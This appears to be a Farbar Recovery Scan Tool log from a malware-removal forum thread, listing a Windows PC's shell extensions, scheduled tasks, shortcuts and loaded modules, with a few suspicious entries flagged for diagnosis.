CustomCLSID: HKU\S-1-5-21-1722513563-2756437970-1780137624-1000_Classes\CLSID\{F241C880-6982-4CE5-8CF7-7085BA96DA5A}\InprocServer32 -> C:\Users\Betts\AppData\Local\Microsoft\SkyDrive\17.0.2015.0811\amd64\SkyDriveShell64.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-1722513563-2756437970-1780137624-1000_Classes\CLSID\{F8071786-1FD0-4A66-81A1-3CBE29274458}\InprocServer32 -> C:\Users\Betts\AppData\Local\Microsoft\SkyDrive\17.0.2015.0811\amd64\FileSyncApi64.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-1722513563-2756437970-1780137624-1000_Classes\CLSID\{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Betts\AppData\Roaming\Dropbox\bin\DropboxExt64.19.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1722513563-2756437970-1780137624-1000_Classes\CLSID\{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Betts\AppData\Roaming\Dropbox\bin\DropboxExt64.19.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1722513563-2756437970-1780137624-1000_Classes\CLSID\{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Betts\AppData\Roaming\Dropbox\bin\DropboxExt64.19.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1722513563-2756437970-1780137624-1000_Classes\CLSID\{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Betts\AppData\Roaming\Dropbox\bin\DropboxExt64.19.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1722513563-2756437970-1780137624-1000_Classes\CLSID\{FB314EDD-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Betts\AppData\Roaming\Dropbox\bin\DropboxExt64.19.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1722513563-2756437970-1780137624-1000_Classes\CLSID\{FB314EDE-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Betts\AppData\Roaming\Dropbox\bin\DropboxExt64.19.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1722513563-2756437970-1780137624-1000_Classes\CLSID\{FB314EDF-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Betts\AppData\Roaming\Dropbox\bin\DropboxExt64.19.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1722513563-2756437970-1780137624-1000_Classes\CLSID\{FB314EE0-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Betts\AppData\Roaming\Dropbox\bin\DropboxExt64.19.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1722513563-2756437970-1780137624-1000_Classes\CLSID\{FB314EE1-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Betts\AppData\Roaming\Dropbox\bin\DropboxExt64.19.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1722513563-2756437970-1780137624-1000_Classes\CLSID\{FB314EE2-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Betts\AppData\Roaming\Dropbox\bin\DropboxExt64.19.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1722513563-2756437970-1780137624-1000_Classes\CLSID\{FBC9D74C-AF55-4309-9FB2-C426E071637F}\InprocServer32 -> C:\Users\Betts\AppData\Roaming\Dropbox\bin\DropboxExt64.19.0.dll (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt01] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Betts\AppData\Roaming\Dropbox\bin\DropboxExt64.19.0.dll [2018-01-09] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt02] -> {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Betts\AppData\Roaming\Dropbox\bin\DropboxExt64.19.0.dll [2018-01-09] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt03] -> {FB314EE1-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Betts\AppData\Roaming\Dropbox\bin\DropboxExt64.19.0.dll [2018-01-09] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt04] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Betts\AppData\Roaming\Dropbox\bin\DropboxExt64.19.0.dll [2018-01-09] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt05] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Betts\AppData\Roaming\Dropbox\bin\DropboxExt64.19.0.dll [2018-01-09] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt06] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Betts\AppData\Roaming\Dropbox\bin\DropboxExt64.19.0.dll [2018-01-09] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt07] -> {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Betts\AppData\Roaming\Dropbox\bin\DropboxExt64.19.0.dll [2018-01-09] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt08] -> {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Betts\AppData\Roaming\Dropbox\bin\DropboxExt64.19.0.dll [2018-01-09] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt09] -> {FB314EE2-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Betts\AppData\Roaming\Dropbox\bin\DropboxExt64.19.0.dll [2018-01-09] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt10] -> {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Betts\AppData\Roaming\Dropbox\bin\DropboxExt64.19.0.dll [2018-01-09] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ GoogleDriveBlacklisted] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D42} => C:\Program Files (x86)\Google\Drive\googledrivesync64.dll [2017-11-10] (Google)
ShellIconOverlayIdentifiers: [ GoogleDriveSynced] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D40} => C:\Program Files (x86)\Google\Drive\googledrivesync64.dll [2017-11-10] (Google)
ShellIconOverlayIdentifiers: [ GoogleDriveSyncing] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D41} => C:\Program Files (x86)\Google\Drive\googledrivesync64.dll [2017-11-10] (Google)
ShellIconOverlayIdentifiers: [ AccExtIco1] -> {AB9CF9F8-8A96-4F9D-BF21-CE85714C3A47} => C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll [2017-09-26] ()
ShellIconOverlayIdentifiers: [ AccExtIco2] -> {853B7E05-C47D-4985-909A-D0DC5C6D7303} => C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll [2017-09-26] ()
ShellIconOverlayIdentifiers: [ AccExtIco3] -> {42D38F2E-98E9-4382-B546-E24E4D6D04BB} => C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll [2017-09-26] ()
ShellIconOverlayIdentifiers: [AutoCAD Digital Signatures Icon Overlay Handler] -> {36A21736-36C2-4C11-8ACB-D4136F2B57BD} => C:\Windows\System32\AcSignIcon.dll [2017-02-03] (Autodesk, Inc.)
ShellIconOverlayIdentifiers: [GDriveSharedOverlay] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D44} => -> No File
ShellIconOverlayIdentifiers: [Groove Explorer Icon Overlay 1 (GFS Unread Stub)] -> {99FD978C-D287-4F50-827F-B2C658EDA8E7} => -> No File
ShellIconOverlayIdentifiers: [Groove Explorer Icon Overlay 2 (GFS Stub)] -> {AB5C5600-7E6E-4B06-9197-9ECEF74D31CC} => -> No File
ShellIconOverlayIdentifiers: [Groove Explorer Icon Overlay 2.5 (GFS Unread Folder)] -> {920E6DB1-9907-4370-B3A0-BAFC03D81399} => -> No File
ShellIconOverlayIdentifiers: [Groove Explorer Icon Overlay 3 (GFS Folder)] -> {16F3DD56-1AF5-4347-846D-7C10C4192619} => -> No File
ShellIconOverlayIdentifiers: [Groove Explorer Icon Overlay 4 (GFS Unread Mark)] -> {2916C86E-86A6-43FE-8112-43ABE6BF8DCC} => -> No File
ShellIconOverlayIdentifiers-x32: [ DropboxExt01] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Betts\AppData\Roaming\Dropbox\bin\DropboxExt64.19.0.dll [2018-01-09] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt02] -> {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Betts\AppData\Roaming\Dropbox\bin\DropboxExt64.19.0.dll [2018-01-09] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt03] -> {FB314EE1-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Betts\AppData\Roaming\Dropbox\bin\DropboxExt64.19.0.dll [2018-01-09] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt04] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Betts\AppData\Roaming\Dropbox\bin\DropboxExt64.19.0.dll [2018-01-09] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt05] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Betts\AppData\Roaming\Dropbox\bin\DropboxExt64.19.0.dll [2018-01-09] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt06] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Betts\AppData\Roaming\Dropbox\bin\DropboxExt64.19.0.dll [2018-01-09] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt07] -> {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Betts\AppData\Roaming\Dropbox\bin\DropboxExt64.19.0.dll [2018-01-09] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt08] -> {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Betts\AppData\Roaming\Dropbox\bin\DropboxExt64.19.0.dll [2018-01-09] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt09] -> {FB314EE2-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Betts\AppData\Roaming\Dropbox\bin\DropboxExt64.19.0.dll [2018-01-09] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt10] -> {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Betts\AppData\Roaming\Dropbox\bin\DropboxExt64.19.0.dll [2018-01-09] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [DropboxExt1] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Betts\AppData\Roaming\Dropbox\bin\DropboxExt64.19.0.dll [2018-01-09] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [DropboxExt2] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Betts\AppData\Roaming\Dropbox\bin\DropboxExt64.19.0.dll [2018-01-09] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [DropboxExt3] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Betts\AppData\Roaming\Dropbox\bin\DropboxExt64.19.0.dll [2018-01-09] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [Groove Explorer Icon Overlay 1 (GFS Unread Stub)] -> {99FD978C-D287-4F50-827F-B2C658EDA8E7} => -> No File
ShellIconOverlayIdentifiers-x32: [Groove Explorer Icon Overlay 2 (GFS Stub)] -> {AB5C5600-7E6E-4B06-9197-9ECEF74D31CC} => -> No File
ShellIconOverlayIdentifiers-x32: [Groove Explorer Icon Overlay 2.5 (GFS Unread Folder)] -> {920E6DB1-9907-4370-B3A0-BAFC03D81399} => -> No File
ShellIconOverlayIdentifiers-x32: [Groove Explorer Icon Overlay 3 (GFS Folder)] -> {16F3DD56-1AF5-4347-846D-7C10C4192619} => -> No File
ShellIconOverlayIdentifiers-x32: [Groove Explorer Icon Overlay 4 (GFS Unread Mark)] -> {2916C86E-86A6-43FE-8112-43ABE6BF8DCC} => -> No File
ContextMenuHandlers1: [AccExt] -> {2A118EB5-5797-4F5E-8B3D-F4ECBA3C98E4} => C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll [2017-09-26] ()
ContextMenuHandlers1: [AcShellExtension.AcContextMenuHandler] -> {2E7A2C6C-B938-40a4-BA1C-C7EC982DC202} => C:\Program Files\Common Files\Autodesk Shared\AcShellEx\AcShellExtension.dll [2017-02-03] (Autodesk)
ContextMenuHandlers1: [ANotepad++64] -> {B298D29A-A6ED-11DE-BA8C-A68E55D89593} => C:\Program Files (x86)\Notepad++\NppShell_05.dll [2012-06-18] ()
ContextMenuHandlers1: [GDContextMenu] -> {BB02B294-8425-42E5-983F-41A1FA970CD6} => C:\Program Files (x86)\Google\Drive\contextmenu64.dll [2017-11-10] (Google)
ContextMenuHandlers1: [ShellConverter] -> {30A4E07E-068A-4d91-8F05-691283A1336B} => C:\Program Files (x86)\Common Files\AVSMedia\ActiveX\AVSShellConverter64.dll [2015-04-06] (Online Media Technologies Ltd.)
ContextMenuHandlers1: [TuneUp Shredder Shell Extension] -> {4858E7D9-8E12-45a3-B6A3-1CD128C9D403} => -> No File
ContextMenuHandlers1: [WinCDEmu] -> {D0E37FD2-F675-426F-B09A-2CF37BA46FD5} => C:\Program Files (x86)\WinCDEmu\x64\WinCDEmuContextMenu.dll [2015-09-29] (Sysprogs OU)
ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2012-06-09] (Alexander Roshal)
ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2012-06-09] (Alexander Roshal)
ContextMenuHandlers1-x32: [XXX Groove GFS Context Menu Handler XXX] -> {6C467336-8281-4E60-8204-430CED96822D} => -> No File
ContextMenuHandlers2: [WinCDEmu] -> {A9901FCD-B4DF-43A1-BD5D-6C9F88679497} => C:\Program Files (x86)\WinCDEmu\x64\WinCDEmuContextMenu.dll [2015-09-29] (Sysprogs OU)
ContextMenuHandlers3: [XXX Groove GFS Context Menu Handler XXX] -> {6C467336-8281-4E60-8204-430CED96822D} => -> No File
ContextMenuHandlers4: [GDContextMenu] -> {BB02B294-8425-42E5-983F-41A1FA970CD6} => C:\Program Files (x86)\Google\Drive\contextmenu64.dll [2017-11-10] (Google)
ContextMenuHandlers4: [TuneUp Disk Space Explorer Shell Extension] -> {4838CD50-7E5D-4811-9B17-C47A85539F28} => -> No File
ContextMenuHandlers4: [TuneUp Shredder Shell Extension] -> {4858E7D9-8E12-45a3-B6A3-1CD128C9D403} => -> No File
ContextMenuHandlers4: [XXX Groove GFS Context Menu Handler XXX] -> {6C467336-8281-4E60-8204-430CED96822D} => -> No File
ContextMenuHandlers5: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\Windows\system32\nvshext.dll [2017-01-20] (NVIDIA Corporation)
ContextMenuHandlers5: [XXX Groove GFS Context Menu Handler XXX] -> {6C467336-8281-4E60-8204-430CED96822D} => -> No File
ContextMenuHandlers6: [AccExt] -> {2A118EB5-5797-4F5E-8B3D-F4ECBA3C98E4} => C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll [2017-09-26] ()
ContextMenuHandlers6: [KyShellExt] -> {FB451ACC-65B5-456a-A84E-6F9B8B75B078} => -> No File
ContextMenuHandlers6: [RUShellExt] -> {2C5515DC-2A7E-4BFD-B813-CACC2B685EB7} => C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RUExt.dll [2012-12-29] (VS Revo Group)
ContextMenuHandlers6: [WinCDEmu] -> {A9901FCD-B4DF-43A1-BD5D-6C9F88679497} => C:\Program Files (x86)\WinCDEmu\x64\WinCDEmuContextMenu.dll [2015-09-29] (Sysprogs OU)
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2012-06-09] (Alexander Roshal)
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2012-06-09] (Alexander Roshal)
ContextMenuHandlers6-x32: [XXX Groove GFS Context Menu Handler XXX] -> {6C467336-8281-4E60-8204-430CED96822D} => -> No File
ContextMenuHandlers1_S-1-5-21-1722513563-2756437970-1780137624-1000: [DropboxExt] -> {ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C} => C:\Users\Betts\AppData\Roaming\Dropbox\bin\DropboxExt64.19.0.dll [2018-01-09] (Dropbox, Inc.)
ContextMenuHandlers4_S-1-5-21-1722513563-2756437970-1780137624-1000: [DropboxExt] -> {ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C} => C:\Users\Betts\AppData\Roaming\Dropbox\bin\DropboxExt64.19.0.dll [2018-01-09] (Dropbox, Inc.)
ContextMenuHandlers5_S-1-5-21-1722513563-2756437970-1780137624-1000: [DropboxExt] -> {ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C} => C:\Users\Betts\AppData\Roaming\Dropbox\bin\DropboxExt64.19.0.dll [2018-01-09] (Dropbox, Inc.)
 

Broni

Malware Annihilator
==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {1698F879-1C4C-436B-8D9A-C9B0E7D23EAF} - System32\Tasks\{8D0201C2-5E52-4C80-8DC4-8BEE345A5ACF} => C:\Users\Betts\Desktop\Tor Browser\Browser\firefox.exe
Task: {296637CB-6020-4C35-9897-E1965D7355E8} - System32\Tasks\DriverDR Scheduled Scan => C:\Program Files\DriverDR.com\DriverDR\DriverDR.exe [2016-05-16] (DriverDR.com)
Task: {2E386336-0957-4A2A-BDA5-E6B618F7C442} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-09-02] (Google Inc.)
Task: {37EBAED9-F813-4865-A365-29406F41D71D} - System32\Tasks\DropboxUpdateTaskUserS-1-5-21-1722513563-2756437970-1780137624-1000Core => C:\Users\Betts\AppData\Local\Dropbox\Update\DropboxUpdate.exe [2016-11-05] (Dropbox, Inc.)
Task: {449DD0F4-4DFD-4E97-8DC5-0FF97BDC88FF} - System32\Tasks\NvTmMon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmMon.exe [2017-01-20] (NVIDIA Corporation)
Task: {4AB82519-9D53-4119-8319-BE41514A8414} - System32\Tasks\Microsoft\Office\Office 15 Subscription Heartbeat => C:\Program Files\Common Files\Microsoft Shared\Office15\OLicenseHeartbeat.exe
Task: {53C8778A-782A-4C9E-A949-8F106DC3BD3F} - System32\Tasks\HPCustParticipation HP Deskjet 2510 series => C:\Program Files\HP\HP Deskjet 2510 series\Bin\HPCustPartic.exe [2012-10-02] (Hewlett-Packard Co.)
Task: {548372FC-6B07-4DBE-A71A-7BD46C2A8EB9} - System32\Tasks\TuneUpUtilities_Task_BkGndMaintenance2013 => C:\Program Files (x86)\TuneUp Utilities 2014\OneClick.exe
Task: {5ABC9943-101A-4F05-B7AD-D427F415D6F4} - System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [2017-01-20] (NVIDIA Corporation)
Task: {61BEF99E-52DE-4A6B-8D40-D5AB74B12B2A} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-09-02] (Google Inc.)
Task: {627A5BFA-279A-4610-B6BB-0C916D7C7FDE} - System32\Tasks\NvTmRep_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [2017-01-20] (NVIDIA Corporation)
Task: {7950B1CD-7C17-4D3B-AEA9-B3605BF394BA} - System32\Tasks\NvTmRepOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [2017-01-20] (NVIDIA Corporation)
Task: {88D277A6-0226-4F8D-8001-20D332B2AA29} - System32\Tasks\Update\helpars => C:\Users\Betts\AppData\Roaming\System.exe <==== ATTENTION
Task: {8C06711F-90B5-452A-A7C4-D1AC02B6950A} - System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [2017-01-20] (NVIDIA Corporation)
Task: {A582A818-ED4F-4110-9E40-1E290B1501D8} - System32\Tasks\gxx speed launcher => C:\Program Files (x86)\Garena\Garena\Garena.exe [2018-08-07] (Garena Online )
Task: {A679A318-C394-4997-B386-702F5D7F043D} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2017-11-14] (Adobe Systems Incorporated)
Task: {AC1A5344-96CD-4148-8C74-85D28483B360} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2018-08-14] (Adobe Systems Incorporated)
Task: {ACB64EC4-FD3D-4325-90A7-656068ECFE69} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2016-08-06] (Piriform Ltd)
Task: {BB3ACBDC-2281-4407-B558-4BE294C6F86A} - System32\Tasks\{24EBF07D-D2DD-436F-908B-58FED99EA3B1} => C:\Windows\system32\pcalua.exe -a C:\PROGRA~2\COMMON~1\INSTAL~1\Driver\11\INTEL3~1\IDriver.exe -c /M{9527A496-5DF9-412A-ADC7-168BA5379CA6}
Task: {C7386A5F-D57F-4D77-8C47-E756451B32E7} - System32\Tasks\{7AF87748-6B4F-4472-993C-3954074A69E1} => C:\Windows\system32\pcalua.exe -a "C:\Users\Betts\Desktop\Flash Tool\Flash_tool.exe" -d "C:\Users\Betts\Desktop\Flash Tool"
Task: {CAD3FED0-847F-4613-9D04-668DC6FFDCFA} - System32\Tasks\{32A4D785-0591-4CB9-A6DD-BAB8D55D502B} => C:\Windows\system32\pcalua.exe -a "C:\Program Files (x86)\RAMRush\unins000.exe"
Task: {D0D55D6F-2C5F-4203-9AED-13E74FB16EC8} - System32\Tasks\{44021E53-AD40-4781-A507-DC00B00E7BF0} => C:\Windows\system32\pcalua.exe -a C:\Users\Betts\Desktop\StealthMiner2.0\StalthMinerInstaller.exe -d C:\Users\Betts\Desktop\StealthMiner2.0
Task: {D71B6302-292F-45A9-AC84-E7786EEE1BF0} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack => C:\Program Files\Microsoft Office\Office15\msoia.exe [2014-01-21] (Microsoft Corporation)
Task: {DE66A451-B198-402A-B850-79F317F54873} - System32\Tasks\DropboxUpdateTaskUserS-1-5-21-1722513563-2756437970-1780137624-1000UA => C:\Users\Betts\AppData\Local\Dropbox\Update\DropboxUpdate.exe [2016-11-05] (Dropbox, Inc.)
Task: {EA1C7874-9BBA-4779-968E-2C66894DCF8C} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn => C:\Program Files\Microsoft Office\Office15\msoia.exe [2014-01-21] (Microsoft Corporation)
Task: {F9A08F7B-5A7A-459D-A766-70D21D18EDA8} - System32\Tasks\{FBAB01FF-9700-4958-B7A3-1563162FBF0E} => C:\Program Files (x86)\Cheat Engine 6.2\Cheat Engine.exe [2012-04-29] ()

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\Windows\Tasks\DriverDR Scheduled Scan.job => C:\Program Files\DriverDR.com\DriverDR\DriverDR.exe--scan C:\Program Files\DriverDR.com
Task: C:\Windows\Tasks\DropboxUpdateTaskUserS-1-5-21-1722513563-2756437970-1780137624-1000Core.job => C:\Users\Betts\AppData\Local\Dropbox\Update\DropboxUpdate.exe
Task: C:\Windows\Tasks\DropboxUpdateTaskUserS-1-5-21-1722513563-2756437970-1780137624-1000UA.job => C:\Users\Betts\AppData\Local\Dropbox\Update\DropboxUpdate.exe
Task: C:\Windows\Tasks\gxx speed launcher.job => C:\Program Files (x86)\Garena\Garena\Garena.exe
Task: C:\Windows\Tasks\Opera scheduled Autoupdate 4086469641.job => C:\Users\Betts\AppData\Roaming\Microsoft\Windows\icfgratf\bafcjfdr.exe
Task: C:\Windows\Tasks\Tweaking.com - Windows Repair Tray Icon.job => D:\WR_Tray_Icon.exeD:\Tweaking.com - Windows Repair)Created By Tweaking.com

==================== Shortcuts & WMI ========================

(The entries could be listed to be restored or removed.)


ShortcutWithArgument: C:\Users\Betts\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --disable-quic
ShortcutWithArgument: C:\Users\Betts\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --disable-quic
ShortcutWithArgument: C:\Users\Betts\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\5d696d521de238c3\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory=Default --disable-quic
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> –enable-easy-off-store-extension-install" --disable-quic

==================== Loaded Modules (Whitelisted) ==============

2018-05-15 18:58 - 2018-05-15 18:58 - 001356088 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\libxml2.dll
2018-05-15 18:59 - 2018-05-15 18:59 - 000088888 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll
2018-08-11 23:27 - 2018-08-23 20:39 - 000026112 _____ () C:\Windows\KMS-R@1n.exe
2013-05-12 16:35 - 2013-05-12 16:35 - 000076888 _____ () C:\Windows\SysWOW64\PnkBstrA.exe
2017-12-01 16:44 - 2017-12-01 16:44 - 000080896 _____ () c:\programdata\{a7fb8cb9-0be2-4c79-bb9c-01f657a649ca}\IEProtectDll64.dll
2018-01-08 21:00 - 2018-01-08 21:00 - 000076456 _____ () C:\Program Files\FileZilla FTP Client\fzshellext_64.dll
2012-06-18 23:24 - 2012-06-18 23:24 - 000222720 _____ () C:\Program Files (x86)\Notepad++\NppShell_05.dll
2017-09-26 02:52 - 2017-09-26 02:52 - 000491600 _____ () C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll
2018-01-18 23:28 - 2018-01-16 21:48 - 000097792 __RSH () C:\Windows\SysWOW64\Windows Server\wserver.exe
2018-09-20 06:40 - 2018-10-22 20:46 - 002148864 _____ () C:\Program Files (x86)\arcai.com\netcut_windows.exe
2016-01-07 00:41 - 2016-01-07 00:41 - 000062168 _____ () C:\Program Files\CCleaner\branding.dll
2018-06-20 21:27 - 2016-02-25 03:30 - 000594944 _____ () C:\Program Files (x86)\I-Funbox DevTeam\exifext_x64.dll
2018-05-15 18:58 - 2018-05-15 18:58 - 000235832 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\libxslt.dll
2018-10-06 21:04 - 2018-11-01 10:24 - 000169984 _____ () C:\Users\Betts\AppData\Local\Temp\svchost.exe
2017-10-13 14:46 - 2017-10-13 14:46 - 000266424 _____ () C:\Program Files (x86)\Garena\Garena\2.0.1808.0718\libprotobuf-lite.dll
2018-08-07 19:07 - 2018-08-07 19:07 - 001442624 _____ () C:\Program Files (x86)\Garena\Garena\2.0.1808.0718\libs\gxx_pipe_engine.dll
2018-08-07 19:06 - 2018-08-07 19:06 - 002207552 _____ () C:\Program Files (x86)\Garena\Garena\2.0.1808.0718\libs\FSFileSytem.dll
2017-12-01 16:44 - 2017-12-01 16:44 - 000088576 _____ () c:\programdata\{a7fb8cb9-0be2-4c79-bb9c-01f657a649ca}\mppsvc.dll
2017-12-01 16:44 - 2017-12-01 16:44 - 000428032 _____ () c:\programdata\{a7fb8cb9-0be2-4c79-bb9c-01f657a649ca}\MPProtect.dll
2018-02-06 17:03 - 2018-01-30 20:37 - 000047688 _____ () C:\Users\Betts\AppData\Local\Viber\qrencode.dll
2018-02-06 17:03 - 2018-01-30 20:37 - 011123272 _____ () C:\Users\Betts\AppData\Local\Viber\ViberRTC.dll
2018-02-06 17:03 - 2018-01-30 20:38 - 000483912 _____ () C:\Users\Betts\AppData\Local\Viber\imageformats\qsvg.dll
2016-02-08 20:45 - 2018-10-24 17:32 - 086734056 _____ () C:\Users\Betts\AppData\Roaming\Spotify\libcef.dll
2016-02-08 20:45 - 2018-10-24 17:31 - 004318952 _____ () C:\Users\Betts\AppData\Roaming\Spotify\libglesv2.dll
